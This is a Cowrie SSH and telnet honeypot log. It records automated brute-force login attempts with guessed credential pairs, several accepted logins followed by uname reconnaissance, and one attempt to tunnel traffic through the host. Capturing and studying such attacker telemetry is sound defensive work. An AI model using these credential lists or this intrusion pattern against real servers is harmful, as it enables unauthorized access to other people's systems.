{"eventid":"cowrie.login.failed","username":"admin","password":"25101992","message":"login attempt [admin/25101992] failed","sensor":"my-vps","timestamp":"2025-08-28T21:44:48.406440Z","src_ip":"212.227.125.160","session":"fa52e228b1fb"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:44:49.469086Z","src_ip":"212.227.125.160","session":"fa52e228b1fb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44140,"dst_ip":"1.2.3.4","dst_port":22,"session":"f9f085d4ffe1","protocol":"ssh","message":"New connection: 212.227.235.229:44140 (1.2.3.4:22) [session: f9f085d4ffe1]","sensor":"my-vps","timestamp":"2025-08-28T21:44:51.126090Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T21:44:51.126854Z","src_ip":"212.227.235.229","session":"f9f085d4ffe1"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-28T21:44:51.228785Z","src_ip":"212.227.235.229","session":"f9f085d4ffe1"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"5b:25:1f:87:f7:65:0c:4b:2b:9e:7d:62:65:cc:5b:87","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQCuVXgJTcU6rZeTL84M+6r8QCjxOlDPt/rEDyLQhbeQ1bKKEzq1xQncwBjNd1lS79ALRicY4s5kmVNa3sLVQ2zx6hMBtXD6ZrE7TRpSWnpv61+z3Rt1df0BYXGQWxkMVlNHBMBlBPOrVY4n3a3b/7C3YQQlgyKChXbzOv3lBM3FrQ==","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 5b:25:1f:87:f7:65:0c:4b:2b:9e:7d:62:65:cc:5b:87","sensor":"my-vps","timestamp":"2025-08-28T21:44:51.537013Z","src_ip":"212.227.235.229","session":"f9f085d4ffe1"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"5b:25:1f:87:f7:65:0c:4b:2b:9e:7d:62:65:cc:5b:87","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQCuVXgJTcU6rZeTL84M+6r8QCjxOlDPt/rEDyLQhbeQ1bKKEzq1xQncwBjNd1lS79ALRicY4s5kmVNa3sLVQ2zx6hMBtXD6ZrE7TRpSWnpv61+z3Rt1df0BYXGQWxkMVlNHBMBlBPOrVY4n3a3b/7C3YQQlgyKChXbzOv3lBM3FrQ==","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T21:44:51.537642Z","src_ip":"212.227.235.229","session":"f9f085d4ffe1"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"5b:25:1f:87:f7:65:0c:4b:2b:9e:7d:62:65:cc:5b:87","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQCuVXgJTcU6rZeTL84M+6r8QCjxOlDPt/rEDyLQhbeQ1bKKEzq1xQncwBjNd1lS79ALRicY4s5kmVNa3sLVQ2zx6hMBtXD6ZrE7TRpSWnpv61+z3Rt1df0BYXGQWxkMVlNHBMBlBPOrVY4n3a3b/7C3YQQlgyKChXbzOv3lBM3FrQ==","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 5b:25:1f:87:f7:65:0c:4b:2b:9e:7d:62:65:cc:5b:87","sensor":"my-vps","timestamp":"2025-08-28T21:44:51.641467Z","src_ip":"212.227.235.229","session":"f9f085d4ffe1"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"5b:25:1f:87:f7:65:0c:4b:2b:9e:7d:62:65:cc:5b:87","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQCuVXgJTcU6rZeTL84M+6r8QCjxOlDPt/rEDyLQhbeQ1bKKEzq1xQncwBjNd1lS79ALRicY4s5kmVNa3sLVQ2zx6hMBtXD6ZrE7TRpSWnpv61+z3Rt1df0BYXGQWxkMVlNHBMBlBPOrVY4n3a3b/7C3YQQlgyKChXbzOv3lBM3FrQ==","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T21:44:51.642290Z","src_ip":"212.227.235.229","session":"f9f085d4ffe1"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:45:01.126359Z","src_ip":"212.227.235.229","session":"f9f085d4ffe1"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":18820,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac45b7b98e8e","protocol":"ssh","message":"New connection: 80.94.95.15:18820 (1.2.3.4:22) [session: ac45b7b98e8e]","sensor":"my-vps","timestamp":"2025-08-28T21:47:50.272952Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T21:47:50.277070Z","src_ip":"80.94.95.15","session":"ac45b7b98e8e"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T21:47:50.341851Z","src_ip":"80.94.95.15","session":"ac45b7b98e8e"}
{"eventid":"cowrie.login.failed","username":"sylvia","password":"sylvia","message":"login attempt [sylvia/sylvia] failed","sensor":"my-vps","timestamp":"2025-08-28T21:47:50.645816Z","src_ip":"80.94.95.15","session":"ac45b7b98e8e"}
{"eventid":"cowrie.login.failed","username":"sylvia","password":"sylvia1","message":"login attempt [sylvia/sylvia1] failed","sensor":"my-vps","timestamp":"2025-08-28T21:47:51.713770Z","src_ip":"80.94.95.15","session":"ac45b7b98e8e"}
{"eventid":"cowrie.login.failed","username":"sylvia","password":"sylvia123","message":"login attempt [sylvia/sylvia123] failed","sensor":"my-vps","timestamp":"2025-08-28T21:47:52.781524Z","src_ip":"80.94.95.15","session":"ac45b7b98e8e"}
{"eventid":"cowrie.login.failed","username":"sylvia","password":"sylvia1234","message":"login attempt [sylvia/sylvia1234] failed","sensor":"my-vps","timestamp":"2025-08-28T21:47:53.850141Z","src_ip":"80.94.95.15","session":"ac45b7b98e8e"}
{"eventid":"cowrie.login.failed","username":"sylvia","password":"sylvia12345","message":"login attempt [sylvia/sylvia12345] failed","sensor":"my-vps","timestamp":"2025-08-28T21:47:54.917629Z","src_ip":"80.94.95.15","session":"ac45b7b98e8e"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:47:55.985788Z","src_ip":"80.94.95.15","session":"ac45b7b98e8e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":30214,"dst_ip":"1.2.3.4","dst_port":22,"session":"d72bf4b2baf0","protocol":"ssh","message":"New connection: 212.227.125.160:30214 (1.2.3.4:22) [session: d72bf4b2baf0]","sensor":"my-vps","timestamp":"2025-08-28T21:48:51.244587Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:48:51.245733Z","src_ip":"212.227.125.160","session":"d72bf4b2baf0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":30498,"dst_ip":"1.2.3.4","dst_port":22,"session":"2899e57f8226","protocol":"ssh","message":"New connection: 212.227.125.160:30498 (1.2.3.4:22) [session: 2899e57f8226]","sensor":"my-vps","timestamp":"2025-08-28T21:48:51.360665Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T21:48:51.361567Z","src_ip":"212.227.125.160","session":"2899e57f8226"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T21:48:51.478869Z","src_ip":"212.227.125.160","session":"2899e57f8226"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T21:48:51.830890Z","src_ip":"212.227.125.160","session":"2899e57f8226"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T21:48:51.948594Z","session":"2899e57f8226"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63764,"dst_ip":"1.2.3.4","dst_port":22,"session":"07b4f3e1d390","protocol":"ssh","message":"New connection: 217.72.205.35:63764 (1.2.3.4:22) [session: 07b4f3e1d390]","sensor":"my-vps","timestamp":"2025-08-28T21:49:18.133242Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:49:18.134548Z","src_ip":"217.72.205.35","session":"07b4f3e1d390"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:50:01.361774Z","src_ip":"212.227.125.160","session":"2899e57f8226"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38328,"dst_ip":"1.2.3.4","dst_port":22,"session":"9fb7eaa39fdc","protocol":"ssh","message":"New connection: 212.227.125.160:38328 (1.2.3.4:22) [session: 9fb7eaa39fdc]","sensor":"my-vps","timestamp":"2025-08-28T21:50:13.884363Z"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:50:15.709728Z","src_ip":"212.227.125.160","session":"9fb7eaa39fdc"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":38508,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3421c9e784c","protocol":"ssh","message":"New connection: 201.148.180.50:38508 (1.2.3.4:22) [session: f3421c9e784c]","sensor":"my-vps","timestamp":"2025-08-28T21:50:32.097208Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T21:50:33.183720Z","src_ip":"201.148.180.50","session":"f3421c9e784c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T21:50:33.184430Z","src_ip":"201.148.180.50","session":"f3421c9e784c"}
{"eventid":"cowrie.login.success","username":"root","password":"M","message":"login attempt [root/M] succeeded","sensor":"my-vps","timestamp":"2025-08-28T21:50:40.552655Z","src_ip":"201.148.180.50","session":"f3421c9e784c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T21:50:43.590498Z","src_ip":"201.148.180.50","session":"f3421c9e784c"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-28T21:50:43.591228Z","src_ip":"201.148.180.50","session":"f3421c9e784c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"1.9","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:50:45.494561Z","src_ip":"201.148.180.50","session":"f3421c9e784c"}
{"eventid":"cowrie.session.closed","duration":"13.4","message":"Connection lost after 13.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:50:45.495879Z","src_ip":"201.148.180.50","session":"f3421c9e784c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57424,"dst_ip":"1.2.3.4","dst_port":22,"session":"bab2229f2061","protocol":"ssh","message":"New connection: 212.227.235.229:57424 (1.2.3.4:22) [session: bab2229f2061]","sensor":"my-vps","timestamp":"2025-08-28T21:52:07.829472Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T21:52:07.830525Z","src_ip":"212.227.235.229","session":"bab2229f2061"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T21:52:07.956034Z","src_ip":"212.227.235.229","session":"bab2229f2061"}
{"eventid":"cowrie.login.failed","username":"admin","password":"dagmarka1304","message":"login attempt [admin/dagmarka1304] failed","sensor":"my-vps","timestamp":"2025-08-28T21:52:08.540250Z","src_ip":"212.227.235.229","session":"bab2229f2061"}
{"eventid":"cowrie.login.failed","username":"admin","password":"openmediavault","message":"login attempt [admin/openmediavault] failed","sensor":"my-vps","timestamp":"2025-08-28T21:52:09.667807Z","src_ip":"212.227.235.229","session":"bab2229f2061"}
{"eventid":"cowrie.login.failed","username":"admin","password":"11111111","message":"login attempt [admin/11111111] failed","sensor":"my-vps","timestamp":"2025-08-28T21:52:10.795582Z","src_ip":"212.227.235.229","session":"bab2229f2061"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234567","message":"login attempt [admin/1234567] failed","sensor":"my-vps","timestamp":"2025-08-28T21:52:11.923826Z","src_ip":"212.227.235.229","session":"bab2229f2061"}
{"eventid":"cowrie.login.failed","username":"admin","password":"root","message":"login attempt [admin/root] failed","sensor":"my-vps","timestamp":"2025-08-28T21:52:13.058329Z","src_ip":"212.227.235.229","session":"bab2229f2061"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:52:14.185756Z","src_ip":"212.227.235.229","session":"bab2229f2061"}
{"eventid":"cowrie.session.connect","src_ip":"119.187.61.14","src_port":38774,"dst_ip":"1.2.3.4","dst_port":23,"session":"c3ccc973a6d7","protocol":"telnet","message":"New connection: 119.187.61.14:38774 (1.2.3.4:23) [session: c3ccc973a6d7]","sensor":"my-vps","timestamp":"2025-08-28T21:53:02.476621Z"}
{"eventid":"cowrie.session.closed","duration":13.54948115348816,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:53:16.026021Z","src_ip":"119.187.61.14","session":"c3ccc973a6d7"}
{"eventid":"cowrie.session.connect","src_ip":"125.26.187.110","src_port":45520,"dst_ip":"1.2.3.4","dst_port":23,"session":"e06cdb52bb1e","protocol":"telnet","message":"New connection: 125.26.187.110:45520 (1.2.3.4:23) [session: e06cdb52bb1e]","sensor":"my-vps","timestamp":"2025-08-28T21:53:20.944436Z"}
{"eventid":"cowrie.session.closed","duration":12.191895961761475,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:53:33.136244Z","src_ip":"125.26.187.110","session":"e06cdb52bb1e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52080,"dst_ip":"1.2.3.4","dst_port":23,"session":"97f55d003924","protocol":"telnet","message":"New connection: 212.227.125.160:52080 (1.2.3.4:23) [session: 97f55d003924]","sensor":"my-vps","timestamp":"2025-08-28T21:54:02.379190Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42410,"dst_ip":"1.2.3.4","dst_port":22,"session":"bdef239491ba","protocol":"ssh","message":"New connection: 212.227.125.160:42410 (1.2.3.4:22) [session: bdef239491ba]","sensor":"my-vps","timestamp":"2025-08-28T21:54:14.760906Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:54:14.924826Z","src_ip":"212.227.125.160","session":"bdef239491ba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52338,"dst_ip":"1.2.3.4","dst_port":23,"session":"d52b0f7944a9","protocol":"telnet","message":"New connection: 212.227.235.229:52338 (1.2.3.4:23) [session: d52b0f7944a9]","sensor":"my-vps","timestamp":"2025-08-28T21:54:26.942133Z"}
{"eventid":"cowrie.session.closed","duration":31.369647979736328,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:54:58.311693Z","src_ip":"212.227.235.229","session":"d52b0f7944a9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37486,"dst_ip":"1.2.3.4","dst_port":22,"session":"1b6bd6e0b670","protocol":"ssh","message":"New connection: 212.227.235.229:37486 (1.2.3.4:22) [session: 1b6bd6e0b670]","sensor":"my-vps","timestamp":"2025-08-28T21:55:30.957328Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T21:55:30.958128Z","src_ip":"212.227.235.229","session":"1b6bd6e0b670"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T21:55:31.061298Z","src_ip":"212.227.235.229","session":"1b6bd6e0b670"}
{"eventid":"cowrie.login.success","username":"root","password":"ZAQ!XSW@","message":"login attempt [root/ZAQ!XSW@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T21:55:31.373339Z","src_ip":"212.227.235.229","session":"1b6bd6e0b670"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T21:55:32.040970Z","src_ip":"212.227.235.229","session":"1b6bd6e0b670"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T21:55:32.041681Z","src_ip":"212.227.235.229","session":"1b6bd6e0b670"}
